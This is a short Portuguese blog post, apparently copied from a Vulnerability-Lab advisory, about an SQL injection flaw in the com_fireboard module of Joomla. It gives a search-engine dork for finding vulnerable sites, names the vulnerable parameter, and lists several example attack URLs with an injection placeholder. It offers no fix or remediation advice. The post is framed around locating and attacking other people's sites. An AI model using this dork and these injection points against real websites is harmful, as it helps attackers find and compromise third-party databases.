sábado, 11 de agosto de 2012

Dork busca vulnerabilidade de injeção SQL joomla.

Dork busca vulnerabilidade de injeção SQL joomla.

A vulnerabilidade de injeção SQL é detectado no módulo com_fireboard do Sistema de Gerenciamento de Conteúdo Joomla.
Atacantes remotos e de baixa contas de usuários privilegiados podem executar / injetar próprios comandos SQL para comprometer a aplicação SGBD.
A vulnerabilidade está localizado no módulo com_fireboard

Módulo vulnerável (s):
[+] index.php?option=com_fireboard

Parâmetro Vulnerável (s):
[+] func fb_

Prova de Conceito:
=================
A vulnerabilidade de injeção SQL pode ser explorada por atacantes remotos sem ação do usuário entre e com baixo
conta de usuário privilegiado.

Dork:inurl:"id=" & intext:"/com_fireboard/"


SITE.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
SITE.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
SITE.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
SITE.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
SITE.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]



Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Nenhum comentário:

Postar um comentário

............